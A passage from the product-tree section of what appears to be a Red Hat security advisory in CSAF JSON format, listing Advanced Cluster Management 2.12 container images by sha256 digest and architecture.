"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:89f973ff38fcf35a484da1531bcf00db5e1d387a64a6dcbb25f19a5c26494584_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:89f973ff38fcf35a484da1531bcf00db5e1d387a64a6dcbb25f19a5c26494584_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:89f973ff38fcf35a484da1531bcf00db5e1d387a64a6dcbb25f19a5c26494584_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:a33b245208c9999546524f3bf971bb220418045dd799cebc43f0413823db0f8b_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:a33b245208c9999546524f3bf971bb220418045dd799cebc43f0413823db0f8b_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:a33b245208c9999546524f3bf971bb220418045dd799cebc43f0413823db0f8b_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ea918d66e2be8cc1411e048f3638afae348a44df36143621bcd3132718b33664_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ea918d66e2be8cc1411e048f3638afae348a44df36143621bcd3132718b33664_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ea918d66e2be8cc1411e048f3638afae348a44df36143621bcd3132718b33664_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:22b747e9952ede6b831297b64684acaafaf3e12998d6872081a08ae39b52c87b_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:22b747e9952ede6b831297b64684acaafaf3e12998d6872081a08ae39b52c87b_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:22b747e9952ede6b831297b64684acaafaf3e12998d6872081a08ae39b52c87b_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:5d368764b9745d9a977bde3c4cd2faac1a344aea716ce626a0904b7da80f5267_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:5d368764b9745d9a977bde3c4cd2faac1a344aea716ce626a0904b7da80f5267_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:5d368764b9745d9a977bde3c4cd2faac1a344aea716ce626a0904b7da80f5267_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:8deed2b9ade0bc7ab30fd93d165fc1a8e18caab7b4af1d1b2b326dc93570c498_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:8deed2b9ade0bc7ab30fd93d165fc1a8e18caab7b4af1d1b2b326dc93570c498_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:8deed2b9ade0bc7ab30fd93d165fc1a8e18caab7b4af1d1b2b326dc93570c498_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:b68a3a1fe74bc4b319859874ca19a4e35c72174afc6a2af08e4bd7b64898d27f_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:b68a3a1fe74bc4b319859874ca19a4e35c72174afc6a2af08e4bd7b64898d27f_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:b68a3a1fe74bc4b319859874ca19a4e35c72174afc6a2af08e4bd7b64898d27f_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5f814b2ab34c4dcaedb7394d9f1ef9bd4d1bf6af934cd716ac44d1cfc43a6edf_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5f814b2ab34c4dcaedb7394d9f1ef9bd4d1bf6af934cd716ac44d1cfc43a6edf_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5f814b2ab34c4dcaedb7394d9f1ef9bd4d1bf6af934cd716ac44d1cfc43a6edf_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:9acfa5180f02a68485cd1fc43e4794c7ffbac02c16942fabfbad9dd586c8ff74_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:9acfa5180f02a68485cd1fc43e4794c7ffbac02c16942fabfbad9dd586c8ff74_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:9acfa5180f02a68485cd1fc43e4794c7ffbac02c16942fabfbad9dd586c8ff74_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c409f96ae15f3022713e434c4c8f146d943dbf48e852e0b8f90b4964ec0736a7_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c409f96ae15f3022713e434c4c8f146d943dbf48e852e0b8f90b4964ec0736a7_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c409f96ae15f3022713e434c4c8f146d943dbf48e852e0b8f90b4964ec0736a7_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f72ecb77638a3d19ef4480040995278031deb4551f139e376994bc0ac3462ef5_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f72ecb77638a3d19ef4480040995278031deb4551f139e376994bc0ac3462ef5_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f72ecb77638a3d19ef4480040995278031deb4551f139e376994bc0ac3462ef5_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:243ea42175c4fa3d189e2f2bf061c9645d5d3b2870378149c52740f563c91ce8_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:243ea42175c4fa3d189e2f2bf061c9645d5d3b2870378149c52740f563c91ce8_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:243ea42175c4fa3d189e2f2bf061c9645d5d3b2870378149c52740f563c91ce8_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3b23775b863a11e1edd62b24c01085b74019b7f414d0784c99d41b1e0e8a6e9b_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3b23775b863a11e1edd62b24c01085b74019b7f414d0784c99d41b1e0e8a6e9b_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3b23775b863a11e1edd62b24c01085b74019b7f414d0784c99d41b1e0e8a6e9b_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3e29508feb3f13f4771e6321f9b2f281d557e3239e52e29301ef30a305ffcde9_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3e29508feb3f13f4771e6321f9b2f281d557e3239e52e29301ef30a305ffcde9_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3e29508feb3f13f4771e6321f9b2f281d557e3239e52e29301ef30a305ffcde9_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:427b347a2e17b66849dc51f9a62563ae8c013d5794c61821141dec737d059304_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:427b347a2e17b66849dc51f9a62563ae8c013d5794c61821141dec737d059304_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:427b347a2e17b66849dc51f9a62563ae8c013d5794c61821141dec737d059304_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:0b87acce1304734d30b2bfbd5d277e72efce2433680111e02fc5cff8127376dd_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:0b87acce1304734d30b2bfbd5d277e72efce2433680111e02fc5cff8127376dd_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:0b87acce1304734d30b2bfbd5d277e72efce2433680111e02fc5cff8127376dd_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:438093777b18dc840316a9a82331d832fdc9f3d83aaae20d97f56ed67b58a359_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:438093777b18dc840316a9a82331d832fdc9f3d83aaae20d97f56ed67b58a359_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:438093777b18dc840316a9a82331d832fdc9f3d83aaae20d97f56ed67b58a359_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:93d29e5678d618cfa84ce60f2d62ba96929ea47ec1515f63a9d61d548968e902_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:93d29e5678d618cfa84ce60f2d62ba96929ea47ec1515f63a9d61d548968e902_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:93d29e5678d618cfa84ce60f2d62ba96929ea47ec1515f63a9d61d548968e902_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b182a45fbe8caf69df6145ed79f2ab0e82c955ff5f5caa7fab8d0faffdb50664_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b182a45fbe8caf69df6145ed79f2ab0e82c955ff5f5caa7fab8d0faffdb50664_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b182a45fbe8caf69df6145ed79f2ab0e82c955ff5f5caa7fab8d0faffdb50664_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:0d6238ef864831d455a4a4b86d860469443079f6dcd26ce3b4fe546800565844_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:0d6238ef864831d455a4a4b86d860469443079f6dcd26ce3b4fe546800565844_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/console-rhel9@sha256:0d6238ef864831d455a4a4b86d860469443079f6dcd26ce3b4fe546800565844_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:5c7378c5f1715490a88eaa2b791b4a643ee089f9b72ad4abfaf32d718f387fc8_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:5c7378c5f1715490a88eaa2b791b4a643ee089f9b72ad4abfaf32d718f387fc8_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/console-rhel9@sha256:5c7378c5f1715490a88eaa2b791b4a643ee089f9b72ad4abfaf32d718f387fc8_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:7e8f4c171a3081e428c168b506c544775876df772803e2cae4512d3c46b45354_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:7e8f4c171a3081e428c168b506c544775876df772803e2cae4512d3c46b45354_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/console-rhel9@sha256:7e8f4c171a3081e428c168b506c544775876df772803e2cae4512d3c46b45354_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:8b0e5d09b887020a657b93953a63a788cf6dfc84200038be8417c2f9cd1df736_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:8b0e5d09b887020a657b93953a63a788cf6dfc84200038be8417c2f9cd1df736_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/console-rhel9@sha256:8b0e5d09b887020a657b93953a63a788cf6dfc84200038be8417c2f9cd1df736_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:4f666d6acef380066f2a35f128a2842ee1f5cf800c93ac6b0fb3c303d3bde26b_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:4f666d6acef380066f2a35f128a2842ee1f5cf800c93ac6b0fb3c303d3bde26b_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:4f666d6acef380066f2a35f128a2842ee1f5cf800c93ac6b0fb3c303d3bde26b_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:6938b16a6314149cc86e10a91e05e9b84e00483dadd1d0353002222a350746bf_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:6938b16a6314149cc86e10a91e05e9b84e00483dadd1d0353002222a350746bf_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:6938b16a6314149cc86e10a91e05e9b84e00483dadd1d0353002222a350746bf_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:8b91cd509eee3e1a5e6475076512709bd233413bfbea5caa44455fd62bcc9d35_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:8b91cd509eee3e1a5e6475076512709bd233413bfbea5caa44455fd62bcc9d35_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:8b91cd509eee3e1a5e6475076512709bd233413bfbea5caa44455fd62bcc9d35_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:f734a96076321df1f52da24f047db29d3956ceb742f4fa488a11d5b302faf66f_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:f734a96076321df1f52da24f047db29d3956ceb742f4fa488a11d5b302faf66f_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:f734a96076321df1f52da24f047db29d3956ceb742f4fa488a11d5b302faf66f_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:1cfe9d5337e2d2d6d714d5d1aecd00ed626f4c70a5a655d89c8001717be9a6f5_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:1cfe9d5337e2d2d6d714d5d1aecd00ed626f4c70a5a655d89c8001717be9a6f5_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:1cfe9d5337e2d2d6d714d5d1aecd00ed626f4c70a5a655d89c8001717be9a6f5_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:488d5dea57994e8d865f8047f3b0ed8b2250273898972eea576fa012bda5c0c4_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:488d5dea57994e8d865f8047f3b0ed8b2250273898972eea576fa012bda5c0c4_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:488d5dea57994e8d865f8047f3b0ed8b2250273898972eea576fa012bda5c0c4_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:5bf4239a40668dd33521ad9cebdc2022331e251ad6fd2e8ec0de8526d321b9e5_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:5bf4239a40668dd33521ad9cebdc2022331e251ad6fd2e8ec0de8526d321b9e5_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:5bf4239a40668dd33521ad9cebdc2022331e251ad6fd2e8ec0de8526d321b9e5_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:bc42add4b0d8571b0b78d09357c574a7d0a858769e6109a13d1487de36ba1d2f_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:bc42add4b0d8571b0b78d09357c574a7d0a858769e6109a13d1487de36ba1d2f_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:bc42add4b0d8571b0b78d09357c574a7d0a858769e6109a13d1487de36ba1d2f_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:1395a46c08410f06aa507bedc8d664b6dabda344d9c604bd71bbd07fb07966c4_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:1395a46c08410f06aa507bedc8d664b6dabda344d9c604bd71bbd07fb07966c4_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:1395a46c08410f06aa507bedc8d664b6dabda344d9c604bd71bbd07fb07966c4_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:4b1bdbd8499769e3fe41d438ff2f98a0a91fecf88d70aa359a6be16aa5454fda_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:4b1bdbd8499769e3fe41d438ff2f98a0a91fecf88d70aa359a6be16aa5454fda_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:4b1bdbd8499769e3fe41d438ff2f98a0a91fecf88d70aa359a6be16aa5454fda_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:91d0b7afff7c89c667986f22280a95ab81409aacaf6c73ac6606bc7bbae98c7e_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:91d0b7afff7c89c667986f22280a95ab81409aacaf6c73ac6606bc7bbae98c7e_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:91d0b7afff7c89c667986f22280a95ab81409aacaf6c73ac6606bc7bbae98c7e_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:c24affed309531bede6ca42f8b2a6b3ba4df5a8c59084bf5050290b8f031f364_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:c24affed309531bede6ca42f8b2a6b3ba4df5a8c59084bf5050290b8f031f364_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:c24affed309531bede6ca42f8b2a6b3ba4df5a8c59084bf5050290b8f031f364_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:036d63ee1fe55977200dce97fd151726266e84423067039c57ca54dcc8b6b440_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:036d63ee1fe55977200dce97fd151726266e84423067039c57ca54dcc8b6b440_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:036d63ee1fe55977200dce97fd151726266e84423067039c57ca54dcc8b6b440_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:1aff938b39c21378c0f8daa439e330159c0bd91f234035a127efb579f6434262_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:1aff938b39c21378c0f8daa439e330159c0bd91f234035a127efb579f6434262_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:1aff938b39c21378c0f8daa439e330159c0bd91f234035a127efb579f6434262_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:540de89284569933a75e87f4c85fc11f987a733f60f9d877f20e5c4fc054fabf_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:540de89284569933a75e87f4c85fc11f987a733f60f9d877f20e5c4fc054fabf_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:540de89284569933a75e87f4c85fc11f987a733f60f9d877f20e5c4fc054fabf_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:8352d34740671e09ebdd558bb2a40a8605aa26afbcfff8dae29ccaf86d81239d_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:8352d34740671e09ebdd558bb2a40a8605aa26afbcfff8dae29ccaf86d81239d_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:8352d34740671e09ebdd558bb2a40a8605aa26afbcfff8dae29ccaf86d81239d_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
